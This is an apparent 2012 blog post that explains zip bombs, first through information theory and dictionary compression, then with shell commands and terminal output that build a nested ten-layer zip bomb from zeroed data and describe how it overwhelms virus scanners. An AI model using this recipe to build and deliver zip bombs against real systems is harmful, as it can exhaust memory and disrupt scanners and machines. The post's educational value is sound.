Friday, October 5, 2012

How 4.5 Petabytes can be compressed to 42 Kilobytes



Theoretical part by I_Wont_Draw_That

Compression comes down to information theory, which is the branch of mathematics and computer science devoted to describing the amount of information in some string of characters. The attack involves compressing a string which is extremely long, but also contains an extremely low amount of information.
Consider the string: abcdefghijklmnopqrstuvwxyz
That is 26 characters. However, the amount of information stored in it may be lower. I could instead represent it as "the english alphabet", which is only 20 characters, and you still know what I mean. Given enough context, I could represent it as "alphabet". And given a shared understand that "0 means abcdefghijklmnopqrstuvwxyz", I could represent it as 0.
Now consider this string: aaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbb
That's 72 characters. But what if I gave you something like: 
0=aaa 1=bbb 010101010101010101010101
That's only 36 characters. Or what if I compressed it more? 
0=aaabbb 000000000000
That's only 21 characters. So we compressed our input from 72 characters to 21 characters without losing any information. This is effectively what zipping a file does. It builds a dictionary of common patterns, aliasing them to shorter strings, and then uses the aliases in their place.
The fewer unique substrings there are, the more compressible the data is, because the dictionary can be smaller, so each alias can be shorter. What happens, then, if the entire input is one pattern repeated many, many times?
For instance, suppose the original string had been 0 repeated a trillion times. To write that string out completely would require 1 terabyte (1 byte per "0" times a trillion of them). But as you just saw, I can easily represent it just as well as "0 repeated a trillion times", which is much, much shorter. That's basically what's happening here. The original content is extremely large, but equally simple, so it compresses into almost nothing. When inflated, it's gigantic.
This extreme runs the other way, as well. For any given compression algorithm, there are inputs which cannot be compressed at all.

Practical part by Rohaq

Basic zip bombs are pretty easy to make.
Create a massive file, let's say, a gig in size, which is full of zeroes, then zip it up. Because the content of the file is uniformly repeated throughout, it compresses very easily:
$ dd if=/dev/zero bs=1024 count=1000000 | zip zipbomb1.zip -
  adding: -1000000+0 records in
1000000+0 records out
1024000000 bytes (1.0 GB) copied, 9.97309 s, 103 MB/s
 (deflated 100%)
$ ls -lh zipbomb1.zip
-rw-r--r-- 1 me me 971K 2012-08-01 18:21 zipbomb1.zip
(The above is under Linux, and pushes 1024*1000000 '0' characters into a zip file with standard compression)
Copy that zip file ten times over. Then add all of these zip files into a single zip file. Because the file content across each zip file is exactly the same, again, this compresses very well:
$ zip -9 zipbomb-lvl2-1.zip zipbomb*
  adding: zipbomb10.zip (deflated 100%)
  adding: zipbomb1.zip (deflated 100%)
  adding: zipbomb2.zip (deflated 100%)
  adding: zipbomb3.zip (deflated 100%)
  adding: zipbomb4.zip (deflated 100%)
  adding: zipbomb5.zip (deflated 100%)
  adding: zipbomb6.zip (deflated 100%)
  adding: zipbomb7.zip (deflated 100%)
  adding: zipbomb8.zip (deflated 100%)
  adding: zipbomb9.zip (deflated 100%)
$ ls -lh zipbomb-lvl2-1.zip 
-rw-r--r-- 1 me me 28K 2012-08-01 18:26 zipbomb-lvl2-1.zip
(The above adds all of the copied zip files into the zip file zipbomb-lvl2-1.zip with the highest level of compression)
Now copy that zip file ten times over, and zip it them all up again. Rinse and repeat, let's say 10 layers deep.
So following from the compression basics people have been mentioning, ignoring individual file headers, etc. the above could be compressed as something as simple as:
[[[[[[[[[[[0]{1024000000}]{10}]{10}]{10}]{10}]{10}]{10}]{10}]{10}]{10}]{10}
Now a virus scanner comes along, and then attempts to scan the zip file. It decompresses the first set of zips, then decompresses each of those, then decompresses each of those. Eventually it gets to the lowest layer, and attempts to decompress these files into memory. At this point you're attempting to decompress 1010 1GB files into memory, so unless you have about 9.3 exabytes of RAM at hand, you're in trouble, and since some scanners automatically scan new files, well, you could be in trouble as soon as you receive or open the file.
Scanners nowadays generally have checks in place to make sure that they're not affected by zip bombs, however, which is probably why MSE is no longer detecting it as a threat.

No comments:

Post a Comment